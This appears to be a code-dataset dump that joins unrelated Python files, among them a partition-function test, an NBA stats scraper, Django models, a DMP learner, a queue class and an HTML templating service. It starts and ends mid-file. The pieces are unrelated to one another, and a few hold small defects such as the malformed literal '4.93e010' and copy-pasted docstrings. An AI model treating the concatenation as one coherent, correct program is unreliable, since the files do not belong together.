1.184544, 1.225988, 1.269010, 1.501456, 1.755494, 2.027655, 2.317420, 2.625339,
2.952505, 3.300375, 3.670713, 4.487378, 5.423159, 6.505528, 7.771334, 9.270601])
ANSWER_ETFSIQ_HIGH = array([5.79E+000, 1.07E+001, 2.13E+001, 4.38E+001, 9.23E+001, 1.97E+002, 4.23E+002,
9.12E+002, 1.97E+003, 4.25E+003, 2.92E+004, 2.00E+005, 1.36E+006, 9.31E+006,
6.34E+007, 4.31E+008, 2.92E+009, 1.97E+010, 1.33E+011, 8.93E+011, 5.98E+012,
3.99E+013, 2.65E+014, 1.76E+015, 1.16E+016, 7.66E+016, 5.03E+017, 3.30E+018,
2.16E+019, 1.41E+020, 9.21E+020, 6.00E+021, 3.91E+022, 2.54E+023, 1.65E+024,
1.07E+025, 6.97E+025, 4.52E+026, 2.94E+027, 1.91E+028, 8.07E+029, 3.42E+031,
1.46E+033, 6.23E+034, 2.68E+036, 1.16E+038, 5.03E+039, 6.45E+043])
ANSWER_FRDM_HIGH = array([9.40e+007, 2.81e+009, 4.93e010, 1.95e+012, 8.84e+013, 3.66e+015, 1.44e+017,
5.48e+018, 2.04e+020, 7.48e+021, 5.72e+025, 4.07e+029, 2.69e+033, 1.66e+037,
9.60e+040, 5.20e+044, 2.65e+048, 1.28e+052, 5.85e+055, 2.55e+059, 1.06e+063,
4.27e+066, 1.65e+070, 6.16e+073, 2.23e+077, 7.87e+080, 2.71e+084, 9.15e+087,
3.03e+091, 9.86e+094, 3.17e+098, 1.00e+102, 3.14e+105, 9.77e+108, 3.01e+112,
9.23e+115, 2.82e+119, 8.56e+122, 2.59e+126, 7.85e+129, 7.18e+136, 6.59e+143,
6.11e+150, 5.74e+157, 5.48e+164, 5.35e+171, 5.34e+178, 1.88e+196])
TEMPERATURES_LOW = array([0.01E+9, 0.15E+9, 0.2E+9, 0.3E+9, 0.4E+9, 0.5E+9, 0.6E+9,
0.7E+9, 0.8E+9, 0.9E+9, 1.0E+9, 1.5E+9, 2.0E+9, 2.5E+9,
3.0E+9, 3.5E+9, 4.0E+9, 4.5E+9, 5.0E+9, 6.0E+9, 7.0E+9,
8.0E+9, 9.0E+9, 10.0E+9])
TEMPERATURES_HIGH = array([12.0E+9, 14.0E+9, 16.0E+9, 18.0E+9, 20.0E+9, 22.0E+9, 24.0E+9,
26.0E+9, 28.0E+9, 30.0E+9, 35.0E+9, 40.0E+9, 45.0E+9, 50.0E+9,
55.0E+9, 60.0E+9, 65.0E+9, 70.0E+9, 75.0E+9, 80.0E+9, 85.0E+9,
90.0E+9, 95.0E+9, 100.0E+9, 105.0E+9, 110.0E+9, 115.0E+9, 120.0E+9,
125.0E+9, 130.0E+9, 135.0E+9, 140.0E+9, 145.0E+9, 150.0E+9, 155.0E+9,
160.0E+9, 165.0E+9, 170.0E+9, 175.0E+9, 180.0E+9, 190.0E+9, 200.0E+9,
210.0E+9, 220.0E+9, 230.0E+9, 240.0E+9, 250.0E+9, 275.0E+9])
DEFAULT = ones_like(TEMPERATURES_LOW)
class TestPartition:
@classmethod
def setup_class(cls):
""" this is run once for each class before any tests """
pass
@classmethod
def teardown_class(cls):
""" this is run once for each class before any tests """
pass
def setup_method(self):
""" this is run once for each class before any tests """
self.pf_table_etfsiq_low = PartitionFunctionTable(dir_etfsiq_low)
self.pf_table_frdm_low = PartitionFunctionTable(dir_frdm_low)
self.pf_table_etfsiq_high = PartitionFunctionTable(dir_etfsiq_high)
self.pf_table_frdm_high = PartitionFunctionTable(dir_frdm_high)
self.co46_pf_etfsiq_low = self.pf_table_etfsiq_low.get_partition_function('co46')
self.ne37_pf_frdm_low = self.pf_table_frdm_low.get_partition_function('ne37')
self.fe47_pf_etfsiq_high = self.pf_table_etfsiq_high.get_partition_function('fe47')
self.po188_pf_frdm_high = self.pf_table_frdm_high.get_partition_function('po188')
self.ne19_pf_frdm_low = self.pf_table_frdm_low.get_partition_function('ne19')
self.ne19_pf_frdm_high = self.pf_table_frdm_high.get_partition_function('ne19')
self.co60_pf_etfsiq_low = self.pf_table_etfsiq_low.get_partition_function('co60')
self.co60_pf_etfsiq_high = self.pf_table_etfsiq_high.get_partition_function('co60')
self.pf_collection_frdm = PartitionFunctionCollection(use_set='frdm')
self.pf_collection_etfsiq = PartitionFunctionCollection(use_set='etfsiq')
def teardown_method(self):
""" this is run once for each class before any tests """
pass
def test_pf(self):
assert all(self.pf_collection_frdm.get_partition_function('p').partition_function == DEFAULT)
assert all(self.pf_collection_etfsiq.get_partition_function('n').partition_function == DEFAULT)
def test_pf_table(self):
assert all(self.co46_pf_etfsiq_low.partition_function == ANSWER_ETFSIQ_LOW)
assert all(self.co46_pf_etfsiq_low.temperature == TEMPERATURES_LOW)
assert all(self.ne37_pf_frdm_low.partition_function == ANSWER_FRDM_LOW)
assert all(self.ne37_pf_frdm_low.temperature == TEMPERATURES_LOW)
assert all(self.fe47_pf_etfsiq_high.partition_function == ANSWER_ETFSIQ_HIGH)
assert all(self.fe47_pf_etfsiq_high.temperature == TEMPERATURES_HIGH)
assert all(self.po188_pf_frdm_high.partition_function == ANSWER_FRDM_HIGH)
assert all(self.po188_pf_frdm_high.temperature == TEMPERATURES_HIGH)
def test_pfsum(self):
assert self.pf_collection_etfsiq.get_partition_function('co60') == self.co60_pf_etfsiq_low + self.co60_pf_etfsiq_high
assert self.pf_collection_frdm.get_partition_function('ne19') == self.ne19_pf_frdm_high + self.ne19_pf_frdm_low
| StarcoderdataPython |
104603 | <reponame>LiuHao-THU/nba_logistic_regression<filename>basketball_reference/nba.py
import json
import logging, logging.config
import requests
from bs4 import BeautifulSoup
from base import BRefMatch, BRefSeason
from constants import LEAGUES_TO_PATH
from utils import TimeoutException, convert_to_min
with open('logging.json', 'r') as f:
logging.config.dictConfig(json.load(f))
logger = logging.getLogger('stringer-bell')
class NbaBRefMatch(BRefMatch):
uri_base = 'http://www.basketball-reference.com/boxscores/{0}.html'
def _read_table(self, table, last_col):
"""
reads given table and updates relevant stats in match dict
"""
away, home = table[0], table[1]
for team, table in zip(['away', 'home'], [away, home]):
self.parse_teams(team, table, last_col)
self.parse_players(team, table)
def parse_teams(self, team, table, plus_minus):
metrics = [metric.text for metric in
table.find('thead').find_all('tr')[1].find_all('th')[2:]]
stats = table.find('tfoot').find_all('td')[1:]
if not plus_minus and '+/-' in metrics:
stats.pop(-1)
metrics.pop(-1)
stats = [float(s.text) for s in stats]
self.match_[team]['totals'].update(dict(zip(metrics, stats)))
def parse_players(self, team, table):
metrics = [metric.text for metric in
table.find('thead').find_all('tr')[1].find_all('th')[1:]]
rows = table.find('tbody').find_all('tr')
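        # drop the mid-table "Reserves" header row separating starters from bench players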
rows.pop(5)
for player in rows:
name = player.th.a.text
stats = [inf.text for inf in player.find_all('td')]
for metric, stat in zip(metrics, stats):
stat = stat if stat != '' else None
if metric == 'MP':
stat = stat if stat not in [None, 'Did Not Play', 'Player Suspended'] else '0.0'
stat = convert_to_min(stat)
stat = float(stat) if stat else None
self.match_[team]['players'][name][metric] = stat
def _gen_scoring(self):
"""
generate and add scoring information to match dict
"""
def gen_scoring(table):
rows = table.find_all('tr')
quarters = [row.text for row in rows[1].find_all('th')[1:]]
away, home = rows[2:4]
scores = {}
for team, scoring in zip(['away', 'home'], [away, home]):
scoring = [score.text for score in scoring.find_all('td')[1:]]
quarters_score = dict(zip(quarters, scoring))
scores[team] = quarters_score
return scores
src = str(self.soup_.find('div', {'id': 'all_line_score'}))
src = src.replace('<!--', '')
scoring_table = BeautifulSoup(src).find('table', {'id': 'line_score'})
quarters_score = gen_scoring(scoring_table)
for team, scores in quarters_score.items():
self.match_[team]['scores'] = scores
def _gen_extra_info(self):
"""
generate and add attendance, duration and officials info to match dict
"""
pass
# divs = [c for c in self.soup_.find('div', {'id': 'content'}).children]
# extra = divs[-12]
# import ipdb; ipdb.set_trace()
# for el in extra:
# if 'referees' in el:
# self.match_['officials'] = [a.text for a in extra.find_all('a')]
# elif 'Attendance:' in el:
# self.match_['attendance'] = int(val.replace(',', ''))
# elif var == 'Time of Game:':
# hours, minutes = val.split(':')
# self.match_['duration'] = int(hours) * 60 + int(minutes)
class NbaBRefSeason(BRefSeason):
def _crawl_match(self, code, match_type):
match = NbaBRefMatch(self.country, self.league, self.season, code, match_type)
if not match.is_crawled():
for j in range(5):
try:
match.crawl()
logger.info('Crawled - {0}'.format(code))
break
except TimeoutException:
logger.info("Timeout. Couldn't crawl match {0}. Retrying {1}/5".format(code, j+1))
continue
except:
logger.exception("Couldn't crawl match{0}".format(code))
break
def _gen_matches_codes(self):
"""
generates b-reference codes for given league, season and date to crawl
"""
self.reg_s_codes_, self.post_s_codes_ = [], []
base_url = LEAGUES_TO_PATH['nba'].format(self.season.split('-')[1])
for month in ['october', 'november', 'december', 'january',
'february', 'march', 'april', 'may', 'june']:
url = base_url.replace('.html', '-' + month + '.html')
self._gen_month_codes(url)
def _gen_month_codes(self, url):
rv = requests.get(url)
soup = BeautifulSoup(rv.text)
seasons = soup.find_all('table', {'class': 'stats_table'})
if len(seasons) == 2:
reg_season, post_season = seasons
else:
reg_season, post_season = seasons[0], None
for codes, table in zip([self.reg_s_codes_, self.post_s_codes_],
[reg_season, post_season]):
if table:
rows = table.tbody.find_all('tr')
for row in rows:
match = row.find('a', href=True, text='Box Score')
if match:
match_code = match['href'].split('/')[2].split('.')[0]
codes.append(match_code)
| StarcoderdataPython |
1729292 | <gh_stars>1-10
__all__ = ('run_tests_in', )
from os.path import isfile as is_file, split as split_paths
from sys import path as system_paths, stdout
from .exceptions import TestLoadingError
from .test_file import __file__ as VAMPYTEST_TEST_FILE_PATH
from .test_file_collector import collect_test_files
from scarletio import render_exception_into
BREAK_LINE = '='*40
def ignore_module_import_frame(file_name, name, line_number, line):
"""
Ignores the frame, where the test file was imported.
Parameters
----------
file_name : `str`
The frame's respective file's name.
name : `str`
The frame's respective function's name.
line_number : `int`
The line's index where the exception occurred.
line : `str`
The frame's respective stripped line.
Returns
-------
should_show_frame : `bool`
Whether the frame should be shown.
"""
return (file_name != VAMPYTEST_TEST_FILE_PATH) or (name != '_get_module') or (line != '__import__(import_route)')
def try_collect_tests(test_file):
"""
Collects tests from the test files.
Parameters
----------
test_file : ``TestFile``
The test file to collect tests from.
Returns
-------
collection_successful : `bool`
Whether no exception occurred.
"""
try:
test_file.get_tests()
except TestLoadingError as err:
exception_parts = [
BREAK_LINE,
'\nException occurred meanwhile loading:\n',
test_file.path,
'\n',
]
render_exception_into(err.source_exception, exception_parts, filter=ignore_module_import_frame)
exception_parts.append(BREAK_LINE)
exception_parts.append('\n')
stdout.write(''.join(exception_parts))
collection_successful = False
else:
collection_successful = True
return collection_successful
def test_result_group_sort_key(test_result_group):
"""
Used to sort result test groups by their name.
Parameters
----------
test_result_group : ``ResultGroup``
Test result group to get sort key of.
Returns
-------
sort_key : `tuple` (`str`, `str`)
"""
case = test_result_group.case
key = (case.import_route, case.name)
return key
def run_tests_in(base_path, path_parts):
if is_file(base_path):
base_path, file_name = split_paths(base_path)
path_parts.insert(0, file_name)
if base_path in system_paths:
base_path_in_system_paths = True
else:
system_paths.append(base_path)
base_path_in_system_paths = False
try:
test_files = collect_test_files(base_path, path_parts)
stdout.write(f'Collected {len(test_files)} test file(s).\n')
test_files = [test_file for test_file in test_files if try_collect_tests(test_file)]
total_test_count = 0
for test_file in test_files:
total_test_count += len(test_file.get_tests())
stdout.write(f'Running {total_test_count} tests of {len(test_files)} files\n{BREAK_LINE}\n')
test_result_groups = []
for test_file in test_files:
for test in test_file.get_tests():
test_result_group = test.invoke()
test_result_groups.append(test_result_group)
test_result_groups.sort(key=test_result_group_sort_key)
failed_tests = []
passed_test_count = 0
skipped_test_count = 0
for test_result_group in test_result_groups:
if test_result_group.is_skipped():
skipped_test_count += 1
keyword = 'S'
elif test_result_group.is_passed():
passed_test_count += 1
keyword = 'P'
elif test_result_group.is_failed():
failed_tests.append(test_result_group)
keyword = 'F'
else:
keyword = '?'
case = test_result_group.case
stdout.write(f'{keyword} {case.import_route}.{case.name}\n')
stdout.write(f'{BREAK_LINE}\n')
for test_result_group in failed_tests:
for failure_message in test_result_group.iter_failure_messages():
stdout.write(failure_message)
stdout.write(f'\n{BREAK_LINE}\n')
stdout.write(f'{len(failed_tests)} failed | {skipped_test_count} skipped | {passed_test_count} passed\n')
finally:
if base_path_in_system_paths:
try:
system_paths.remove(base_path)
except ValueError:
pass
| StarcoderdataPython |
1740477 | <filename>600-699/650.py<gh_stars>0
class Solution:
def minSteps(self, n: int) -> int:
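        # The minimum number of Copy-All/Paste steps to reach n 'A's is the sum of
        # n's prime factors: a factor f costs one Copy followed by f - 1 Pastes.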
ans = 0
i = 2
while i * i <= n:
while n % i == 0:
n //= i
ans += i
i += 1
return ans + n if n != 1 else ans
| StarcoderdataPython |
3392599 |
LOCATIONS = {
"Utqiaġvik": {
"geolocation": (70.9, -156),
"name": "<NAME> <NAME>",
"papers": [""],
"data": {},
"description": """
<p>BW start of degradation in early 1950s mostly stable by early 2000s
(~90% IW studied stable) Kanesvskiy et al. (2017) </p>
"""
},
"<NAME>": {
"geolocation": (70.2288, -148.4186), ## location of Jorgenson et al. (2015)
"name": "<NAME>",
"data": {},
"papers": ["Raynolds et al. (2014)", "Jorgenson et al. (2015)" ],
"description": """
367 ha in 1968 -> 663 ha in 2010 with most of change after 1990 -- Raynolds et al. (2014).
Thermokarst extent was relatively small from 1949 (0.9%) to 1988
(1.5%), abruptly increased from 1988 to 2004 (6.3%), and increased
slightly from 2004 to 2012 (7.5%). Given that ice wedges occupy
32% of the upper 1 m of permafrost in the study area based on
the geometric method, we estimate that ~23% (7.5%/32%)
of the surface of the ice wedges has been degraded, but the
degradation was usually limited to the top ~0.5 m of the wedges.
-- Jorgenson et al. (2015)
"""
},
"NPRA": {
"geolocation": (70.25, -151.5), ## location of Jorgenson et al. (2015)
"name": "NPRA near Nuiqsut",
"data": {},
"papers": ["Jorgenson et al. (2003)", ],
"description": """
degradation thought to be due to warmer temperature in 1989 - 1998
--Jorgenson et al. (2003)
"""
},
"ACP": {
"geolocation": (70.25, -151.5), ## location of Jorgenson et al. (2015)
"name": "Arctic Coastal Plain",
"data": {},
"papers": [ ],
"description": """"""
}
}
| StarcoderdataPython |
3218551 | <reponame>LSDOlab/csdl
from csdl.core.variable import Variable
from csdl.core.output import Output
import csdl.operations as ops
from typing import List
import numpy as np
def matmat(mat1, mat2):
'''
This function can compute a matrix-matrix multiplication, similar to the
numpy counterpart.
**Parameters**
mat1: Variable
The first input for the matrix-matrix multiplication
mat2: Variable
The second input for the matrix-matrix multiplication
'''
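    # Usage sketch (hypothetical variable names, assuming mat1 and mat2 were
    # declared inside a csdl Model, e.g. via create_input/declare_variable):
    #     prod = csdl.matmat(mat1, mat2)   # shape (mat1.shape[0], mat2.shape[1])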
if not (isinstance(mat1, Variable) and isinstance(mat2, Variable)):
raise TypeError("Arguments must both be Variable objects")
if not (len(mat1.shape) == 2 and len(mat2.shape) == 2):
raise ValueError(
"Arguments must both be matrices (rank 2 tensors); {} has shape {}, and {} has shape {}"
.format(
mat1.name,
mat1.shape,
mat2.name,
mat2.shape,
))
op = ops.matmat(mat1, mat2)
op.outs = [
Output(
None,
op=op,
shape=(mat1.shape[0], mat2.shape[1]),
),
]
# for out in op.outs:
# out.add_dependency_node(op)
return op.outs[0]
| StarcoderdataPython |
4809972 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Created on Mon Oct 30 19:00:00 2017
@author: gsutanto
"""
import numpy as np
from scipy import signal
import os
import sys
import copy
sys.path.append(os.path.join(os.path.dirname(__file__), '../dmp_param/'))
sys.path.append(os.path.join(os.path.dirname(__file__), '../dmp_base/'))
sys.path.append(os.path.join(os.path.dirname(__file__), '../utilities/'))
from LearningSystem import *
from TransformSystemDiscrete import *
from FuncApproximatorDiscrete import *
from utilities import *
class LearningSystemDiscrete(LearningSystem, object):
"""Class for learning systems of discrete DMPs.
Implemented free of (or abstracted away from)
the type of state (DMPState/QuaternionDMPState/etc.).
The function getTargetForcingTermTraj() of transform_sys is the one
who shall take care of the particular state type being used
in its implementation underneath.
"""
def __init__(self, transformation_system_discrete, name=''):
super(LearningSystemDiscrete, self).__init__(transformation_system_discrete,
name)
def isValid(self):
assert (super(LearningSystemDiscrete, self).isValid())
return True
def learnApproximator(self, list_dmptrajectory_demo_local,
robot_task_servo_rate):
assert (self.isValid())
assert (robot_task_servo_rate > 0.0)
N_traj = len(list_dmptrajectory_demo_local)
assert (N_traj > 0)
list_Ft = [None] * N_traj
list_cX = [None] * N_traj
list_cV = [None] * N_traj
list_tau = [None] * N_traj
list_A_learn = [None] * N_traj
list_G = [None] * N_traj
list_PSI = [None] * N_traj
for i in range(N_traj):
dmptrajectory_demo_local = list_dmptrajectory_demo_local[i]
Ft_inst, cX_inst, cV_inst, tau_inst, tau_relative_inst, A_learn_inst, G_inst = self.transform_sys.getTargetForcingTermTraj(
dmptrajectory_demo_local, robot_task_servo_rate)
list_Ft[i] = Ft_inst
list_cX[i] = cX_inst
list_cV[i] = cV_inst
list_tau[i] = tau_inst
list_A_learn[i] = A_learn_inst
list_G[i] = G_inst
PSI_inst = self.transform_sys.func_approx.getBasisFunctionTensor(cX_inst)
list_PSI[i] = PSI_inst
mean_tau = np.mean(list_tau)
mean_A_learn = np.mean(list_A_learn, axis=0)
Ft = np.hstack(list_Ft)
cX = np.hstack(list_cX)
cV = np.hstack(list_cV)
G = np.hstack(list_G)
PSI = np.hstack(list_PSI)
if (self.transform_sys.canonical_sys.order == 2):
MULT = cV
elif (self.transform_sys.canonical_sys.order == 1):
MULT = cX
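    # Locally weighted regression: for each basis function, fit a scalar weight that
    # maps the phase-multiplied basis activations to the target forcing term.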
sx2 = np.sum(
np.matmul(
np.ones((self.transform_sys.func_approx.model_size, 1)),
np.square(MULT)) * PSI,
axis=1)
list_w = [None] * self.transform_sys.dmp_num_dimensions
for i in range(self.transform_sys.dmp_num_dimensions):
sxtd = np.sum(
np.matmul(
np.ones((self.transform_sys.func_approx.model_size, 1)),
(MULT * Ft[[i], :])) * PSI,
axis=1)
w_dim = sxtd * 1.0 / (sx2 + 1.e-10)
list_w[i] = w_dim.T
W = np.vstack(list_w)
assert (np.isnan(W).any() == False), 'Learned W contains NaN!'
self.transform_sys.func_approx.weights = W
self.transform_sys.A_learn = mean_A_learn
Fp = np.matmul(W, PSI) * np.matmul(
np.ones((self.transform_sys.dmp_num_dimensions, 1)),
(MULT * 1.0 / np.sum(PSI, axis=0).reshape(
(1, PSI.shape[1])))) # predicted forcing term
N_filter_order = 2 # Butterworth filter order
fc = 10.0 # cutoff frequency (in Hz)
fs = robot_task_servo_rate # sampling frequency (in Hz)
Wn = fc / (fs / 2)
[b, a] = signal.butter(N_filter_order, Wn)
Ft_filtered = signal.filtfilt(b, a, Ft, axis=1)
nmse_fit = computeNMSE(Fp.T, Ft_filtered.T)
print('NMSE of forcing term fitting = ' + str(nmse_fit))
return W, mean_A_learn, mean_tau, Ft, Fp, G, cX, cV, PSI
| StarcoderdataPython |
3380409 | # Listing_14-6.py
# Copyright Warren & <NAME>, 2013
# Released under MIT license http://www.opensource.org/licenses/mit-license.php
# Version $version ----------------------------
# HotDog class with cook(), add_condiments(), and __str__()
class HotDog:
def __init__(self):
self.cooked_level = 0
self.cooked_string = "Raw"
self.condiments = []
# Define the new __str__() method, which
# displays hot dog, including condiments
def __str__(self):
msg = "hot dog"
if len(self.condiments) > 0:
msg = msg + " with "
for i in self.condiments:
msg = msg+i+", "
msg = msg.strip(", ")
msg = self.cooked_string + " " + msg + "."
return msg
def cook(self, time):
self.cooked_level=self.cooked_level+time
if self.cooked_level > 8:
self.cooked_string = "Charcoal"
elif self.cooked_level > 5:
self.cooked_string = "Well-done"
elif self.cooked_level > 3:
self.cooked_string = "Medium"
else:
self.cooked_string = "Raw"
def addCondiment(self, condiment):
self.condiments.append(condiment)
myDog = HotDog() # create an instance
# test the methods
print myDog
print "Cooking hot dog for 4 minutes..."
myDog.cook(4)
print myDog
print "Cooking hot dog for 3 more minutes..."
myDog.cook(3)
print myDog
print "What happens if I cook it for 10 more minutes?"
myDog.cook(10)
print myDog
print "Now, I'm going to add some stuff on my hot dog"
myDog.addCondiment("ketchup")
myDog.addCondiment("mustard")
print myDog
| StarcoderdataPython |
30218 | from django.db import models
from django.contrib.postgres.fields import ArrayField
from django.urls import reverse
# Create your models here.
class Neighbourhood(models.Model):
image = models.ImageField(upload_to='neighbourhood_avatars', default='dummy_neighbourhood.jpg')
name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
police_hotline= ArrayField(models.CharField(max_length=13, blank=True),size=3, blank=True, null=True)
hospital_hotline= ArrayField(models.CharField(max_length=13, blank=True),size=3, blank=True, null=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('home')
class Business(models.Model):
FOOD = 1
BEAUTY = 2
SOCIAL = 3
ENTERTAINMENT = 4
HOUSING = 5
BUSINESS_CATEGORIES = [
(FOOD, 'Food and Beverages'),
(BEAUTY, 'Beauty shops'),
        (SOCIAL, 'Social Amenity'),
(ENTERTAINMENT, 'Entertainment'),
(HOUSING, 'Housing'),
]
image = models.ImageField(upload_to='business_avatars', default='business.jpg')
name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
description = models.TextField(blank=True, null=True)
category = models.PositiveSmallIntegerField(choices=BUSINESS_CATEGORIES)
neighbourhood = models.ForeignKey(Neighbourhood, on_delete=models.CASCADE, related_name='businesses')
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('neighbourhood', args=[self.neighbourhood.id])
@classmethod
def search_business(cls,search_term,hood):
return cls.objects.get(
models.Q(name__icontains = search_term),
models.Q(description__icontains =search_term),
models.Q(neighbourhood = hood)
) | StarcoderdataPython |
3366802 | import numpy as np
# Iterate!
def Init(fpix, K = 5):
'''
'''
# Compute the 1st order PLD model
fsap = np.sum(fpix, axis = 1)
A = fpix / fsap.reshape(-1,1)
w = np.linalg.solve(np.dot(A.T, A), np.dot(A.T, fsap))
model = np.dot(A, w)
fdet = fsap - model + 1
# The data matrix
F = np.array(fpix)
# Estimate S from PLD de-trended flux
S = 0.5 + np.array(fdet) / 2
S = np.ones_like(fdet)
# Estimate A with PCA
X = F / S.reshape(-1, 1)
X -= np.nanmedian(X, axis = 0)
U, _, _ = np.linalg.svd(X)
A = U[:,:K]
A = np.hstack((np.ones((fpix.shape[0], 1)), A))
return F, S, A
def Step(F, S, A):
'''
'''
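    # One alternating-least-squares pass: solve for B given (S, A), then for A
    # given B, then rescale S so that S * (A @ B) best matches the data F.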
# Dimensions
nt = F.shape[0]
# Update B
ATA = np.dot(A.T, (S ** 2)[:,None] * A)
ATF = np.dot(A.T, S[:,None] * F)
B = np.linalg.solve(ATA, ATF)
# Update A
b1 = B[0,:]
BBT = np.dot(B[1:], B[1:].T)
BFT = np.dot(B[1:], (F / S[:,None] - b1[None,:]).T)
A = np.hstack((np.ones(nt).reshape(-1,1), np.linalg.solve(BBT, BFT).T))
# Update S
M = np.dot(A, B)
S = np.sum(M * F, axis = 1) / np.sum(M * M, axis = 1)
return F, S, A
import h5py
import matplotlib.pyplot as plt
import numpy as np
f = h5py.File('archive.hdf5', 'a')
dset = f['images']
times = np.loadtxt('times.txt')
target = dset[150:190, 150:190, :]
comparison1 = dset[170:200, 185:220, :]
fractional_target = (target/np.sum(target, axis=(0, 1))).reshape((40*40, -1))
fractional_comp = (comparison1/np.sum(comparison1, axis=(0, 1))).reshape((comparison1.shape[0] * comparison1.shape[1]), -1)
F, S, A = Init(fractional_target.T)
for n in range(20):
F, S, A = Step(F, S, A)
F, S_c, A = Init(fractional_comp.T)
for n in range(20):
F, S_c, A = Step(F, S_c, A)
plt.plot(times, S/S_c, '.')
# plt.plot(S_c)
plt.show() | StarcoderdataPython |
1696651 | from typing import Any, List
from dataclasses import dataclass, field
from PyDS.Error import Empty
@dataclass
class Queue:
"""Implementation of Queue ADT
:param __capacity: The maximum number of elements a queue can hold
:type __capacity: int
:param __list: A container that holds n-elements in queue
:type __list: list[Any]
:param __front: The index pointing at front of queue
:type __front: int
:param __size: The size of the queue
:type __size: int
"""
__capacity: int = 64
__list: List[Any] = field(default_factory=lambda: [None] * Queue.__capacity)
__front: int = 0
__size: int = 0
def enqueue(self, value: Any) -> None:
"""Insertion to the tail of the queue
:param value: The value inserting to the tail
:type value: Any
"""
if self.__size == self.__capacity:
self.__resize(capacity=2 * self.__capacity)
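        # Circular buffer: the insertion slot wraps around modulo the capacity.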
end = (self.__front + self.__size) % self.__capacity
self.__list[end] = value
self.__size += 1
def dequeue(self) -> Any:
"""Deletion at the front of the queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
if 0 < self.__size < (self.__capacity // 4):
self.__resize(capacity=self.__capacity // 2)
value = self.__list[self.__front]
self.__list[self.__front] = None
self.__front = (self.__front + 1) % self.__capacity
self.__size -= 1
return value
def front(self) -> Any:
"""Gets value at front of queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
return self.__list[self.__front]
def is_empty(self) -> bool:
"""Checks to see if queue is empty
:return: Whether or not the queue's empty
:rtype: bool
"""
return self.__size == 0
def __resize(self, capacity: int) -> None:
"""Resize queue with twice the capacity"""
list_ = [None] * capacity
front = self.__front
for i in range(self.__size):
list_[i] = self.__list[front]
front = (front + 1) % self.__capacity
self.__front = 0
self.__list = list_
self.__capacity = capacity
def __len__(self) -> int:
return self.__size
def __str__(self) -> str:
if self.is_empty():
return 'Queue([])'
front = self.__front
output = 'Queue(['
for _ in range(self.__size - 1):
output += f'{self.__list[front]}, '
front = (front + 1) % self.__capacity
output += f'{self.__list[front]}])'
return output
| StarcoderdataPython |
130775 | import json
from typing import List
from injector import inject
from sqlalchemy import text
from infrastructure.dependency.scopes import IScoped
from infrastructure.json.JsonConvert import JsonConvert
from models.configs.ApplicationConfig import ApplicationConfig
@JsonConvert.register
class Pagination:
def __init__(self,
Filter: str = None,
Page: int = None,
PageUrl: str = None,
Limit: int = None,
TotalPage: int = None,
TotalCount: int = None
):
self.Filter: str = Filter
self.Page: int = Page
self.PageUrl: str = PageUrl
self.Limit: int = Limit
self.TotalPage: int = TotalPage
self.TotalCount: int = TotalCount
class HtmlTemplateService(IScoped):
@inject
def __init__(self,
application_config: ApplicationConfig
):
self.application_config: ApplicationConfig = application_config
@property
def default_css(self):
pagination_css = '''
.pagination {
display: table;
margin: 0 auto;
padding: 20px;
}
.pagination a {
color: black;
float: left;
padding: 8px 16px;
text-decoration: none;
transition: background-color .3s;
border: 1px solid #ddd;
}
.pagination a.active {
background-color: #4CAF50;
color: white;
border: 1px solid #4CAF50;
}
.pagination a:hover:not(.active) {background-color: #ddd;}
'''
return '''
.wrapper{
margin: 0 auto;
padding: 20px;
}
.container600 {
width: 300px;
max-width: 100%;
}
@media all and (max-width: 600px) {
.container600 {
width: 100% !important;
}
}
.col49 {
width: 49%;
}
.col2 {
width: 2%;
}
.col50 {
width: 50%;
}
@media all and (max-width: 599px) {
.fluid {
width: 100% !important;
}
.reorder {
width: 100% !important;
margin: 0 auto 10px;
}
.ghost-column {
display:none;
height:0;
width:0;
overflow:hidden;
max-height:0;
max-width:0;
}
}
.pdi-column{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 12px;
line-height:10px;
}
.pdi-row{
text-align: left;
padding:4px;
font-family: Arial,sans-serif;
font-size: 10px;
line-height:10px;
}
.row-nowrap{
white-space: nowrap;
}
table {
border-collapse: collapse;
width: 100%;
}
th, td {
text-align: left;
padding: 8px;
}
tr:nth-child(even) {background-color: #f2f2f2;}
ul.breadcrumb {
padding: 10px 16px;
list-style: none;
background-color: #eee;
}
ul.breadcrumb li {
display: inline;
font-size: 18px;
}
ul.breadcrumb li+li:before {
padding: 8px;
color: black;
content: "/\00";
}
ul.breadcrumb li a {
color: #0275d8;
text-decoration: none;
}
ul.breadcrumb li a:hover {
color: #01447e;
text-decoration: underline;
}
''' + pagination_css
def mail_html_template(self, body, mail_css=None):
css = mail_css if mail_css is not None else self.default_css
template = f'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<style>{css}</style>
</head>
<body>
{body}
</body>
</html>
'''
return template
def get_nullable_dict_value(self, dict, key):
if key in dict:
return dict[key]
return None
def get_dict_value(self, dict, key):
if key in dict and dict[key] is not None:
return dict[key]
return ''
def prepare_table_data_dynamic(self, query, headers, prepare_row, sortable=None, pagination: Pagination = None):
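        # Apply optional ordering and pagination to the query, then build one row
        # dict per result via the caller-supplied prepare_row callback.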
if sortable is not None:
query = query.order_by(text(sortable))
pagination_json = None
if pagination is not None:
total_count = query.count()
if pagination.Limit is None or pagination.Limit < 1 or pagination.Limit > 200:
pagination.Limit = 50
total_page = int(total_count / pagination.Limit) + 1
if pagination.Page is None or pagination.Page < 1 or total_page < pagination.Page:
pagination.Page = 1
if pagination.Limit:
query = query.limit(pagination.Limit)
if pagination.Page:
offset = (pagination.Page - 1) * pagination.Limit
if offset is None or offset <= 0:
offset = 0
query = query.offset(offset)
pagination_json = {'PageUrl': pagination.PageUrl, 'PageNumber': pagination.Page, 'Limit': pagination.Limit,
'Count': total_count, 'TotalPage': total_page,'Filter':pagination.Filter}
rows = []
for data in query:
row = prepare_row(data)
rows.append(row)
return {'columns': headers, 'rows': rows,
'pagination': pagination_json}
def render_table(self, source, width=None):
columns: List[str] = self.get_nullable_dict_value(source, 'columns')
